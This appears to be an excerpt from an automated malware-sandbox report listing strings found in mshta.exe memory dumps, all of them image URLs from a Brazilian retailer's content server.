Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409658561.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000095A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-bebidas-638b2185dbc9.png96648a2579.p
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485032710.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411110659.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.png.png
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngent
Source: mshta.exe, 00000000.00000003.25386576642.000000000947B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngndi=
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cabelos-958c5b847ba9.pngng
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.png=
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngH
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngO
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngR
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngana
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-cama-mesa-banho-b9a0799a7519.pngectm
Source: mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387415599.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25375820983.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437986277.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25464701881.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25393422841.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25396803939.0000000009525000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483416952.0000000006F3B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411198817.0000000006F38000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409811303.0000000009537000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.png
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444767802.000000000950D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484826803.000000000950E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410145601.00000000094F5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411529883.0000000009507000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngW;
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngan=
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngg
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386820435.000000000946F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410252202.0000000009470000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386618817.0000000009462000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402152855.0000000009470000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pnghb
Source: mshta.exe, 00000000.00000003.25394294677.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-eletrodomesticos-9f15f33cde2a.pngt
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25432134093.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25437986277.0000000009C45000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404882839.000000000A919000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-informatica-acessorios-8f96648a2579.
Source: mshta.exe, 00000000.00000003.25411479647.0000000009577000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25478295458.000000000AADC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A923000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25411110659.000000000AADA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402958159.000000000AAD4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A916000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402504692.000000000AAA9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25400030275.000000000A922000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.png
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484434504.000000000949C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386040349.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386906783.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25402240267.0000000009499000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.pngZ
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.pngh
Source: mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397591598.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.0000000009570000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.pngp
Source: mshta.exe, 00000000.00000003.25396464078.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000095A5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377901544.000000000A9E0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377604683.000000000A9B4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25485163864.00000000095B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459330511.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25383535661.000000000A9E3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25443579320.00000000095A6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398775142.000000000A914000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25381281478.000000000BE80000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398590694.00000000095A8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25403564909.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392249908.000000000302C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009566000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25395908364.000000000955F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-suplementos-vitaminas-2e13c2882cd2.p
Source: mshta.exe, 00000000.00000003.25379781338.000000000945E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25398256426.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379542505.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25458668902.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25483562137.0000000006F53000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460571625.0000000009578000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459467924.000000000AC79000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25392497277.0000000009570000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25463225262.000000000957C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25404918834.000000000947C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25409943508.0000000009572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484690315.00000000094EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.000000000955E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378502221.0000000006F52000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317838412.00000000067E1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460101803.000000000AC8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25410207961.000000000947C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/15/403398377_1344107672905432_87087219184302511
Source: mshta.exe, 00000000.00000003.25387195053.0000000009498000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25477786545.00000000094FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25394294677.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25379781338.00000000094EA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25465016480.000000000AA25000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25459044559.00000000094FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25397453283.00000000094F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25460055106.0000000009499000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25487528616.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25317648569.00000000067B5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25399279067.000000000A948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25377467003.000000000AB7B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25386992749.0000000003028000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25438095878.0000000009C19000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.0000000009497000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25376826074.000000000AC9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.25484648425.00000000094C3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25378553891.000000000944F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25385047921.00000000094B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.25444186991.000000000A948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/05/02/250x260-atalho-app-mais-barato-no-app-129882
